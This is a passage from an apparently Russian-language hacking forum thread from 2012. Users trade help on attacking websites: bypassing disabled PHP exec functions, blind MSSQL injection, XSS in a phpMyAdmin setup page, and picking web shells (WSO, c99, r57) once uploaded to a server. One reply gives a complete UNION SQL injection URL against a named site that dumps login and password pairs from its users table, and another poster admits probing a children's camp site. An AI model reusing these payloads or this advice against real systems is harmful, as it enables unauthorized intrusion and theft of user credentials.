 |
|
03.09.2012, 02:27
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
С нами:
8417113
Репутация:
0
|
|
Сообщение от stan_q
Есть freebsd, в php отключены popen,exec,system,passthru,proc_open,shell_exec.
Делал в отдельной папке, чмод 755 на скрипт, папка тоже 755, htaccess с текстом
Код:
Options +ExecCGI
AddHandler cgi-script cgi pl
При обращении к скрипту через браузер получаю исходный код.
Может, неверно указывал пути к перлу, но проверить это не могу, т.к. open_base_dir, пробовал самые распространенные.
Как можно запустить перл скрипт из браузера? Возможно там Perl и нет, если .htaccess действителен, то вам нужно указать путь какой либо исполняемого файла, к примеру /usr/bin/python, так-же может иметься возможность написать приложение на C++.
|
|
|
03.09.2012, 03:52
|
|
Познающий
Регистрация: 19.04.2008
Сообщений: 67
С нами:
9505375
Репутация:
19
|
|
Приветствую! Есть слепая скуля на MS SQL Server'е... можно ли как-нить читать файлики на сервере, юзая блинд? права SYSTEM
|
|
|
|
03.09.2012, 08:43
|
|
Новичок
Регистрация: 05.01.2010
Сообщений: 9
С нами:
8603990
Репутация:
0
|
|
Ошибки следующего вида при подставлении ' в строку
http://i.imgur.com/ZErAT.png
Но когда перебираю +UNION+SELECT+1,2,..+--+
Ничего не исчезает!
До 30ти перебирал.
Как раскрутить эту sql?
|
|
|
|
03.09.2012, 16:44
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от foma9999
Ошибки следующего вида при подставлении ' в строку
http://i.imgur.com/ZErAT.png
Но когда перебираю +UNION+SELECT+1,2,..+--+
Ничего не исчезает!
До 30ти перебирал.
Как раскрутить эту sql?
пантамимой не занимаемся, скиньте URL или не задавайте подобные вопросы на которые просто не возможно ответить
|
|
|
|
03.09.2012, 16:55
|
|
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
С нами:
9318329
Репутация:
394
|
|
foma9999,
Код:
http://www.advis.ru/gotovye-issledovaniya/page.php?ID=-20839'+union+select+1,group_concat(login,0x3a,password),3,4,5,6,7,8,9,0,11,concat_ws(0x3a,version(),user(),database()),13,14,15,16,17,18,19,20,21,22+from+users--+
|
|
|
|
04.09.2012, 20:54
|
|
Новичок
Регистрация: 17.08.2012
Сообщений: 2
С нами:
7229846
Репутация:
0
|
|
Сообщение от M_script
Сообщи администрации лагеря об уязвимости и получи бесплатную путевку на следующий сезон.
Спасибо тебе за дружеский совет ,
но я интересуюсь не для нажива ради, а только с целью научиться что делать в подобных ситуациях, в данном случае Артек подвернулся под руку...
|
|
|
|
05.09.2012, 14:35
|
|
Новичок
Регистрация: 16.03.2012
Сообщений: 12
С нами:
7451606
Репутация:
0
|
|
phpmyadmin 3.3.8
Зашел на /pma/setup/index.php создал сервер с именем alert("like this")
Подскажите плиз как можно это использовать?
|
|
|
|
05.09.2012, 18:44
|
|
Участник форума
Регистрация: 18.01.2012
Сообщений: 162
С нами:
7535126
Репутация:
1
|
|
залил на серв wso и на тебе:
Warning: gzinflate() has been disabled for security reasons in путь : regexp code on line 1
первый раз с таким сталкиваюсь , я так понял эта функция отключена(гуглил ,но не понял насколько эта функция критична для вебшелла) какой тогда шелл попробывать?
|
|
|
|
05.09.2012, 19:13
|
|
Новичок
Регистрация: 19.05.2010
Сообщений: 6
С нами:
8411065
Репутация:
4
|
|
blesse любой где не используется эта функция, wso не пакованный, c99, c100, r57, Safe0ver и тд..
|
|
|
|
07.09.2012, 17:41
|
|
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
С нами:
7712246
Репутация:
23
|
|
Сообщение от LelouchMe
Ребят, а что тут? http://grandis.me/index.php?f=stat&act=pk&sid=1'+UNION+SELECT+1,2,3, 4,5,6,7,8,9,10,11+--+
это не скуля
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
